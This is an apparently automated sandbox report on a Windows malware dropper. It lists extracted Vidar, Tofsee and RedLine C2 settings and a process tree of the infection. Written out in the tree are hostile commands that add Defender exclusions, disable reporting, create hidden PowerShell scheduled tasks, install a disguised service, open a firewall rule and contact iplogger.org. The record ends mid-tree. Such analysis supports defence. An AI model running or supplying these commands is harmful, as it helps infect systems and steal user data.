Analysis

  • max time kernel
    68s
  • max time network
    158s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    22-02-2022 05:10

General

  • Target

    3402e1a7f9615bf5b2e6e09f6f6a02f7e0037fb8de29b9d02e8360405278c686.exe

  • Size

    3.0MB

  • MD5

    2ce5f706c7d49f726c6b9ad6ca65b296

  • SHA1

    a562594458ab589ec395c0687ff6a549c0f90640

  • SHA256

    3402e1a7f9615bf5b2e6e09f6f6a02f7e0037fb8de29b9d02e8360405278c686

  • SHA512

    a4995b6b1c134e8c7d97030db3191f233100433703282eebcb3f2ea6be4de5cc08aa195321c1d1629ea6a1535d8e7e7282e175ac66ec3129d30b04c8bfa81b6c

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

tofsee

C2

patmushta.info

ovicrush.cn

Extracted

Family

redline

Botnet

333333

C2

2.56.57.212:13040

Attributes
  • auth_value

    3efa022bc816f747304fd68e5810bb78

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • OnlyLogger

    A tiny loader that uses IPLogger to get its payload.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 12 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 6 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

    suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

    suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

  • OnlyLogger Payload 2 IoCs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 24 IoCs
  • Modifies Windows Firewall 1 TTPs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 7 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Drops file in Windows directory 6 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 20 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3402e1a7f9615bf5b2e6e09f6f6a02f7e0037fb8de29b9d02e8360405278c686.exe
    "C:\Users\Admin\AppData\Local\Temp\3402e1a7f9615bf5b2e6e09f6f6a02f7e0037fb8de29b9d02e8360405278c686.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3588
    • C:\Users\Admin\AppData\Local\Temp\7zS40E22A7D\setup_install.exe
      "C:\Users\Admin\AppData\Local\Temp\7zS40E22A7D\setup_install.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:636
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sahiba_7.exe
        3⤵
          PID:3344
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sahiba_6.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3692
          • C:\Users\Admin\AppData\Local\Temp\7zS40E22A7D\sahiba_6.exe
            sahiba_6.exe
            4⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious use of WriteProcessMemory
            PID:3548
            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
              5⤵
              • Executes dropped EXE
              PID:3468
            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
              5⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              PID:4308
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sahiba_5.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1068
          • C:\Users\Admin\AppData\Local\Temp\7zS40E22A7D\sahiba_5.exe
            sahiba_5.exe
            4⤵
            • Executes dropped EXE
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:3948
            • C:\Users\Admin\Documents\4lOMIM6fP9VYE4snH5HlTa9_.exe
              "C:\Users\Admin\Documents\4lOMIM6fP9VYE4snH5HlTa9_.exe"
              5⤵
                PID:4876
                • C:\Users\Admin\Documents\4lOMIM6fP9VYE4snH5HlTa9_.exe
                  "C:\Users\Admin\Documents\4lOMIM6fP9VYE4snH5HlTa9_.exe"
                  6⤵
                    PID:1084
                • C:\Users\Admin\Documents\Ds8O_y9IOqRq8q_CF0ylSH4Z.exe
                  "C:\Users\Admin\Documents\Ds8O_y9IOqRq8q_CF0ylSH4Z.exe"
                  5⤵
                  • Executes dropped EXE
                  PID:4740
                  • C:\Windows\SysWOW64\control.exe
                    "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",
                    6⤵
                      PID:4288
                      • C:\Windows\SysWOW64\rundll32.exe
                        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",
                        7⤵
                          PID:1852
                    • C:\Users\Admin\Documents\LdjOKcExbT2xgvNJ2DaEDNVS.exe
                      "C:\Users\Admin\Documents\LdjOKcExbT2xgvNJ2DaEDNVS.exe"
                      5⤵
                      • Executes dropped EXE
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4812
                    • C:\Users\Admin\Documents\DjNGfUP1ScN1DtgB5KPO5T9i.exe
                      "C:\Users\Admin\Documents\DjNGfUP1ScN1DtgB5KPO5T9i.exe"
                      5⤵
                      • Executes dropped EXE
                      PID:4816
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 4816 -s 624
                        6⤵
                        • Program crash
                        PID:992
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 4816 -s 632
                        6⤵
                        • Program crash
                        PID:3492
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 4816 -s 660
                        6⤵
                        • Program crash
                        PID:1948
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 4816 -s 672
                        6⤵
                        • Program crash
                        PID:5704
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 4816 -s 1252
                        6⤵
                        • Program crash
                        PID:5860
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 4816 -s 1260
                        6⤵
                        • Program crash
                        PID:5948
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 4816 -s 1248
                        6⤵
                        • Program crash
                        PID:1984
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 4816 -s 1256
                        6⤵
                        • Program crash
                        PID:1348
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c taskkill /im "DjNGfUP1ScN1DtgB5KPO5T9i.exe" /f & erase "C:\Users\Admin\Documents\DjNGfUP1ScN1DtgB5KPO5T9i.exe" & exit
                        6⤵
                          PID:4700
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /im "DjNGfUP1ScN1DtgB5KPO5T9i.exe" /f
                            7⤵
                            • Kills process with taskkill
                            PID:1824
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 4816 -s 1112
                          6⤵
                          • Program crash
                          PID:5016
                      • C:\Users\Admin\Documents\5r3b9dyQKxLCofm9uSzmjhyP.exe
                        "C:\Users\Admin\Documents\5r3b9dyQKxLCofm9uSzmjhyP.exe"
                        5⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4776
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          6⤵
                            PID:4252
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            6⤵
                              PID:3452
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              6⤵
                                PID:4144
                            • C:\Users\Admin\Documents\f8Rb0U4HQ78qUsuDkQQTsvTi.exe
                              "C:\Users\Admin\Documents\f8Rb0U4HQ78qUsuDkQQTsvTi.exe"
                              5⤵
                              • Executes dropped EXE
                              PID:3712
                              • C:\Users\Admin\AppData\Local\Temp\7zS1E9C.tmp\Install.exe
                                .\Install.exe
                                6⤵
                                • Executes dropped EXE
                                PID:3388
                                • C:\Users\Admin\AppData\Local\Temp\7zS33BB.tmp\Install.exe
                                  .\Install.exe /S /site_id "525403"
                                  7⤵
                                    PID:4104
                                    • C:\Windows\SysWOW64\forfiles.exe
                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                      8⤵
                                        PID:2996
                                        • C:\Windows\SysWOW64\cmd.exe
                                          /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                          9⤵
                                            PID:4972
                                            • \??\c:\windows\SysWOW64\reg.exe
                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                              10⤵
                                                PID:5220
                                              • \??\c:\windows\SysWOW64\reg.exe
                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                10⤵
                                                  PID:5524
                                            • C:\Windows\SysWOW64\forfiles.exe
                                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                              8⤵
                                                PID:3336
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                  9⤵
                                                    PID:4208
                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                      10⤵
                                                        PID:3588
                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                        10⤵
                                                          PID:5268
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /CREATE /TN "gxPqgqeCq" /SC once /ST 00:28:51 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                      8⤵
                                                      • Creates scheduled task(s)
                                                      PID:4552
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /run /I /tn "gxPqgqeCq"
                                                      8⤵
                                                        PID:5556
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        schtasks /DELETE /F /TN "gxPqgqeCq"
                                                        8⤵
                                                          PID:1940
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          schtasks /CREATE /TN "bnkqNuphAZeBTHhYMc" /SC once /ST 05:13:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\WOJEBgcpJeoAyOioJ\wwLMGvKHJFdcKei\XbRavey.exe\" j1 /site_id 525403 /S" /V1 /F
                                                          8⤵
                                                          • Creates scheduled task(s)
                                                          PID:5252
                                                  • C:\Users\Admin\Documents\LxpPh9TFpCgLKn4kod6OOLNx.exe
                                                    "C:\Users\Admin\Documents\LxpPh9TFpCgLKn4kod6OOLNx.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    PID:2424
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2424 -s 1964
                                                      6⤵
                                                      • Program crash
                                                      PID:5336
                                                  • C:\Users\Admin\Documents\A2cfus4fBuzFs1EL0d1YKlre.exe
                                                    "C:\Users\Admin\Documents\A2cfus4fBuzFs1EL0d1YKlre.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    PID:4956
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4956 -s 460
                                                      6⤵
                                                      • Program crash
                                                      PID:2276
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4956 -s 468
                                                      6⤵
                                                      • Program crash
                                                      PID:2400
                                                  • C:\Users\Admin\Documents\QFVD94Rm_BhbZusgBXMhVk0U.exe
                                                    "C:\Users\Admin\Documents\QFVD94Rm_BhbZusgBXMhVk0U.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    PID:4084
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 468
                                                      6⤵
                                                      • Program crash
                                                      PID:1352
                                                  • C:\Users\Admin\Documents\VjrgL1AMekaMIn7tzoVcM9jr.exe
                                                    "C:\Users\Admin\Documents\VjrgL1AMekaMIn7tzoVcM9jr.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    PID:4940
                                                  • C:\Users\Admin\Documents\Bt0d6JO5X6h63uHM0Ymbqbb_.exe
                                                    "C:\Users\Admin\Documents\Bt0d6JO5X6h63uHM0Ymbqbb_.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    PID:4952
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ztsineby\
                                                      6⤵
                                                        PID:1704
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\mekltlmb.exe" C:\Windows\SysWOW64\ztsineby\
                                                        6⤵
                                                          PID:2536
                                                        • C:\Windows\SysWOW64\sc.exe
                                                          "C:\Windows\System32\sc.exe" create ztsineby binPath= "C:\Windows\SysWOW64\ztsineby\mekltlmb.exe /d\"C:\Users\Admin\Documents\Bt0d6JO5X6h63uHM0Ymbqbb_.exe\"" type= own start= auto DisplayName= "wifi support"
                                                          6⤵
                                                            PID:668
                                                          • C:\Windows\SysWOW64\sc.exe
                                                            "C:\Windows\System32\sc.exe" description ztsineby "wifi internet conection"
                                                            6⤵
                                                              PID:2044
                                                            • C:\Windows\SysWOW64\sc.exe
                                                              "C:\Windows\System32\sc.exe" start ztsineby
                                                              6⤵
                                                                PID:2056
                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                6⤵
                                                                  PID:2500
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 660
                                                                  6⤵
                                                                  • Program crash
                                                                  PID:4432
                                                              • C:\Users\Admin\Documents\Pr6ceSX8xMukADLM5cTFQ9SL.exe
                                                                "C:\Users\Admin\Documents\Pr6ceSX8xMukADLM5cTFQ9SL.exe"
                                                                5⤵
                                                                • Executes dropped EXE
                                                                PID:4780
                                                              • C:\Users\Admin\Documents\H0a5xDSKZ_NdeAHZE8VSIsoV.exe
                                                                "C:\Users\Admin\Documents\H0a5xDSKZ_NdeAHZE8VSIsoV.exe"
                                                                5⤵
                                                                • Executes dropped EXE
                                                                • Checks computer location settings
                                                                PID:4752
                                                                • C:\Windows\SysWOW64\svchost.exe
                                                                  "C:\Windows\System32\svchost.exe"
                                                                  6⤵
                                                                    PID:444
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c cmd < Detto.xla
                                                                    6⤵
                                                                      PID:4376
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd
                                                                        7⤵
                                                                          PID:1164
                                                                          • C:\Windows\SysWOW64\tasklist.exe
                                                                            tasklist /FI "imagename eq BullGuardCore.exe"
                                                                            8⤵
                                                                            • Enumerates processes with tasklist
                                                                            PID:4244
                                                                          • C:\Windows\SysWOW64\find.exe
                                                                            find /I /N "bullguardcore.exe"
                                                                            8⤵
                                                                              PID:4504
                                                                            • C:\Windows\SysWOW64\tasklist.exe
                                                                              tasklist /FI "imagename eq PSUAService.exe"
                                                                              8⤵
                                                                              • Enumerates processes with tasklist
                                                                              PID:5252
                                                                            • C:\Windows\SysWOW64\find.exe
                                                                              find /I /N "psuaservice.exe"
                                                                              8⤵
                                                                                PID:5440
                                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                                findstr /V /R "^wtwRMqjYMlcblhfrOaJNpOohYASICCRoGRaYHSofIqwzkvtDhVASceYjWNSjoDvlzhRaVdvWpzypNPwCvgcGwZMDTye$" Hai.xla
                                                                                8⤵
                                                                                  PID:5980
                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sta.exe.pif
                                                                                  Sta.exe.pif V
                                                                                  8⤵
                                                                                    PID:5488
                                                                            • C:\Users\Admin\Documents\O3FsoYRsz4K3WYTBre8Qge1m.exe
                                                                              "C:\Users\Admin\Documents\O3FsoYRsz4K3WYTBre8Qge1m.exe"
                                                                              5⤵
                                                                                PID:1500
                                                                                • C:\Users\Admin\AppData\Local\Temp\798LL.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\798LL.exe"
                                                                                  6⤵
                                                                                    PID:4116
                                                                                  • C:\Users\Admin\AppData\Local\Temp\798LL.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\798LL.exe"
                                                                                    6⤵
                                                                                      PID:604
                                                                                    • C:\Users\Admin\AppData\Local\Temp\798LL.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\798LL.exe"
                                                                                      6⤵
                                                                                        PID:4900
                                                                                      • C:\Users\Admin\AppData\Local\Temp\798LL.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\798LL.exe"
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4876
                                                                                      • C:\Users\Admin\AppData\Local\Temp\798LL.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\798LL.exe"
                                                                                        6⤵
                                                                                          PID:3904
                                                                                        • C:\Users\Admin\AppData\Local\Temp\6L7BI18JL24GICH.exe
                                                                                          https://iplogger.org/1OUvJ
                                                                                          6⤵
                                                                                            PID:936
                                                                                          • C:\Users\Admin\AppData\Local\Temp\63GDC.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\63GDC.exe"
                                                                                            6⤵
                                                                                              PID:3280
                                                                                              • C:\Windows\SysWOW64\control.exe
                                                                                                "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\TEBW8SGT.CpL",
                                                                                                7⤵
                                                                                                  PID:856
                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                    "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\TEBW8SGT.CpL",
                                                                                                    8⤵
                                                                                                      PID:5296
                                                                                                      • C:\Windows\system32\RunDll32.exe
                                                                                                        C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\TEBW8SGT.CpL",
                                                                                                        9⤵
                                                                                                          PID:5788
                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                            "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\TEBW8SGT.CpL",
                                                                                                            10⤵
                                                                                                              PID:5808
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c sahiba_4.exe
                                                                                                3⤵
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:3648
                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS40E22A7D\sahiba_4.exe
                                                                                                  sahiba_4.exe
                                                                                                  4⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:1856
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c sahiba_3.exe
                                                                                                3⤵
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:1416
                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS40E22A7D\sahiba_3.exe
                                                                                                  sahiba_3.exe
                                                                                                  4⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Modifies system certificate store
                                                                                                  PID:3108
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3108 -s 932
                                                                                                    5⤵
                                                                                                    • Program crash
                                                                                                    • Checks processor information in registry
                                                                                                    • Enumerates system info in registry
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    PID:4356
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c sahiba_2.exe
                                                                                                3⤵
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:2852
                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS40E22A7D\sahiba_2.exe
                                                                                                  sahiba_2.exe
                                                                                                  4⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Checks SCSI registry key(s)
                                                                                                  PID:2088
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c sahiba_1.exe
                                                                                                3⤵
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:756
                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS40E22A7D\sahiba_1.exe
                                                                                                  sahiba_1.exe
                                                                                                  4⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Checks computer location settings
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:2700
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS40E22A7D\sahiba_1.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\7zS40E22A7D\sahiba_1.exe" -a
                                                                                                    5⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:3900
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 636 -s 628
                                                                                                3⤵
                                                                                                • Program crash
                                                                                                • Checks processor information in registry
                                                                                                • Enumerates system info in registry
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                PID:3900
                                                                                          • C:\Windows\system32\rUNdlL32.eXe
                                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                            1⤵
                                                                                            • Process spawned unexpected child process
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:4104
                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                              2⤵
                                                                                              • Loads dropped DLL
                                                                                              PID:4132
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 608
                                                                                                3⤵
                                                                                                • Program crash
                                                                                                • Checks processor information in registry
                                                                                                • Enumerates system info in registry
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:4240
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4132 -ip 4132
                                                                                            1⤵
                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:4200
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3108 -ip 3108
                                                                                            1⤵
                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:4332
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                            1⤵
                                                                                            • Drops file in Windows directory
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:4512
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 636 -ip 636
                                                                                            1⤵
                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:2384
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4780 -s 396
                                                                                            1⤵
                                                                                            • Program crash
                                                                                            PID:4120
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4780 -ip 4780
                                                                                            1⤵
                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                            PID:3664
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 396 -p 4084 -ip 4084
                                                                                            1⤵
                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                            PID:4056
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4956 -ip 4956
                                                                                            1⤵
                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                            PID:4496
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 456
                                                                                            1⤵
                                                                                            • Program crash
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            PID:4484
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
